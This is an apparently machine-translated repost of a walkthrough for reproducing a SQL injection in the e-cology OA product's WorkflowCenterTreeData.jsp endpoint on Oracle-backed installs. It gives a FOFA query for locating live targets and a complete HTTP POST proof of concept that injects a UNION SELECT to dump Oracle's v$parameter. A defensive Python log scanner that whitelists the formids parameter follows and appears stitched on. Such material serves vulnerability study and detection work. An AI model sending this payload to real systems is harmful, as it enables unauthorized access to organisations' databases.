
How to reproduce the e-cology OA front-end SQL injection vulnerability

2025-03-01 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01 Report

This article walks through reproducing the front-end SQL injection vulnerability in e-cology OA. The content is fairly detailed; interested readers can refer to it, and I hope it is helpful to you.

0x00 Introduction

E-cology provides mobile office, WeChat office, collaborative office (OA), process management, information portal, knowledge management, cost control management and other functions, and runs on both mobile phones and PCs. It is one of the mainstream OA systems in use today.

0x01 Principle overview

The vulnerability exists because the WorkflowCenterTreeData interface of the OA system does not sanitize user input before using it in a database query. Attacker-controlled SQL fragments are passed through to the Oracle database, resulting in SQL injection.

0x02 Affected scope

Pan-micro e-cology OA systems backed by an Oracle database.

0x03 Environment setup

Online environment (tonight only):

Send a reward (any amount) and forward the article, then contact the author to obtain it.

FOFA search:

App= "Pan Micro-Collaborative Office OA"

Build it yourself:

Reply "pan-micro environment" in the official account to get the build materials.

0x04 Vulnerability exploitation

Once a Pan-micro OA instance backed by an Oracle database is found, use the (publicly disclosed) PoC directly.

If the vulnerability is not present, the response looks as follows (screenshot not reproduced here).

If the vulnerability exists, a large amount of data is echoed directly in the response.

The concise version of the PoC is as follows (do not use it for illegal purposes):

```http
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Connection: close
Upgrade-Insecure-Requests: 1

formids=11111111111))%0a%0dunion select NULL,value from v$parameter order by (1)
```

0x05 Remediation advice

The vendor has published an update on its official website; please update as soon as possible.

That concludes the walkthrough of reproducing the e-cology OA front-end SQL injection vulnerability. I hope the content above is of some help to you and that you can learn something from it. If you think the article is good, please share it so more people can see it.
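Until the vendor update is applied, a defender can at least detect attempts against this endpoint: the `formids` parameter described above should only ever carry a comma-separated list of integers, so anything else (such as the `))` plus `union select` fragment in the PoC) is worth alerting on. The following log-scanning check is an added example written for this article, not code from the page or from the OA product; the access-log format (request line followed by the URL-decoded POST body in quotes) and the sample lines are constructed assumptions, and the same whitelist is what the endpoint itself should enforce server-side.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (not taken from the page). The last quoted
# field is assumed to be the POST body as some reverse proxies log it.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2019:10:00:01 +0800] "POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1" 200 512 "formids=12,13,14"
10.0.0.9 - - [01/Jun/2019:10:00:07 +0800] "POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1" 200 98311 "formids=11111111111))%0a%0dunion select NULL,value from v$parameter order by (1)"
10.0.0.7 - - [01/Jun/2019:10:00:09 +0800] "GET /login/Login.jsp HTTP/1.1" 200 2048 "-"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\w+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+) "(?P<body>[^"]*)"$'
)
TARGET = "/mobile/browser/WorkflowCenterTreeData.jsp"
# The only shape formids should ever have: one or more integers separated by commas.
FORMIDS_OK = re.compile(r"\d+(,\d+)*")


def check_formids(body: str):
    """Return None if every formids value passes the whitelist, else a reason string."""
    params = parse_qs(body, keep_blank_values=True)  # also URL-decodes %0a, %0d, %20 ...
    for value in params.get("formids", []):
        if not FORMIDS_OK.fullmatch(value):
            # Show the analyst the offending value (truncated) rather than just a flag.
            return "formids is not a comma-separated integer list: %r" % value[:60]
    return None


def scan(log_text: str):
    """Return [(source_ip, reason)] for requests to the endpoint whose formids fails the whitelist."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format; skip rather than crash
        path = m.group("path").split("?", 1)[0]  # ignore the query string when matching
        if path != TARGET:
            continue
        body = "" if m.group("body") == "-" else m.group("body")
        reason = check_formids(body)
        if reason:
            hits.append((m.group("src"), reason))
    return hits


if __name__ == "__main__":
    for src, reason in scan(SAMPLE_LOG):
        print("ALERT", src, reason)
```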


© 2024 shulou.com SLNews company. All rights reserved.
